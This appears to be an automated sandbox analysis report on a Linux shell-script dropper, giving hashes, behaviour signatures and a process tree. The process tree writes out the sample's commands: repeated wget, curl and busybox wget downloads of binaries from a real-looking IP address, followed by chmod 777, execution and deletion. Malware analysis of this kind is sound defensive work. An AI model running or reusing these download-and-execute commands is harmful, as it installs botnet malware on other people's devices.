Analysis
-
max time kernel
13s -
max time network
14s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
-
Size
10KB
-
MD5
1ac86a90ce63f5179c129c8cf2fda09b
-
SHA1
93b8c384331017eeb6de7c986cc660f98b161846
-
SHA256
6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f
-
SHA512
41efa6d2d833f311f30c0bc54b03684a2a367b8a2af5ef65c4558e978d25c26be60b9adf80b8f136de6f226c8d22f66cb74600dbd88cfeed4e1a7c92eda7cda0
-
SSDEEP
192:WryGNuGD2K9GmNVqMw1+9NeVlhl9NeVlhWHyGNuGp2K9Gmp:KyGNuGD2K9GmNVqMw1PyGNuGp2K9Gmp
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 688 chmod 747 chmod 805 chmod 811 chmod 677 chmod 695 chmod 728 chmod 757 chmod 766 chmod 796 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 679 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 689 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 697 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 729 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 749 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 758 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 768 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 797 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 806 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 812 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl
Processes
-
/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:673
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:679
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:680
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:682
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:687
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:690
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:691
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:693
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:697
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:698
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:699
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:709
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:744
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:756
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:763
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:793
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:804
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:810
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:814
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97